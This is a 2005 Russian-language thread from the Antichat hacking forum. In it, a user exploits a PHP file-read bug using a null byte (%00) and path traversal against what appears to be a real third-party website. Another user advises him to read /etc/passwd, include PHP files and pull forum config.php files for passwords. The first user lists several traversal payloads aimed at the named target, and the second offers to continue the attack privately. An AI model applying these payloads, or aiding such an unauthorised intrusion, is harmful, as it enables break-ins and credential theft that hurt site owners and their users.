Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   %00 в сайте (https://forum.antichat.xyz/showthread.php?t=12119)

wsr 24.12.2005 23:19

%00 в сайте
 
Прива всем!
Нашел сайт, который читает информацию из файлов так:
http:/*.*/index.php?page=now
<?
$f = fopen ("$page.txt","r+");
while (!feof($f))
{
$s = fgets($f,255);
echo $s;
}
?>

Используюя багу (нулл-байт [%00]) я могу читать любые файлы (http:/*.*/index.php?page=index.php%00 - выведет index.php на экран)
А что нить кроме чтения файлов с этого можно поиметь?

Чтение etc/shadow, passwd не предлагать!
{Hack detected. Contact the support.}

Rebz 24.12.2005 23:27

в принципе да...
попробуй провести php-инклудинг... и прочесть файлик /etc/passwd =)
посмотри есть ли на этом сайте форум какой-нить.. с форума можно будет прочесть всякие config.php =)) вобщем, ищи пароли))

wsr 24.12.2005 23:30

Форум - phpbb какой-то!
Посмотрю конфиги! Гыыы

wsr 24.12.2005 23:31

Где конфиг лежит нашел! Только открыть не могу!
Короче viktim.com
/home2/viktim/public_html/index.php - тут бага!
Форум forum.viktim.com/s/
а как к нему путь?
Пробовал так :/home2/viktim/public_html/forum/s/ - ничего не находит! Даже index.php

Rebz 25.12.2005 00:57

вообще-то ты неправильно пробуешь..
ты же должен искать файлы через свою багу.. т.е. писать не весь абс. путь, а путь, относительно бажного скрипта.. т.е.
index.php?page=../../s/config.php - например так..

wsr 25.12.2005 01:27

да я уже и так и так пробовал! Толку никакого!
page=../../s/index.php
page=../s/index.php
page=s/index.php
page=forum/s/index.php
page=../forum/s/index.php
page=../../forum/s/index.php

Rebz 25.12.2005 01:28

ну если хочешь, можешь мне в ПМ кинуть ссылку, вместе посмотрим чё там есть -)


Время: 21:34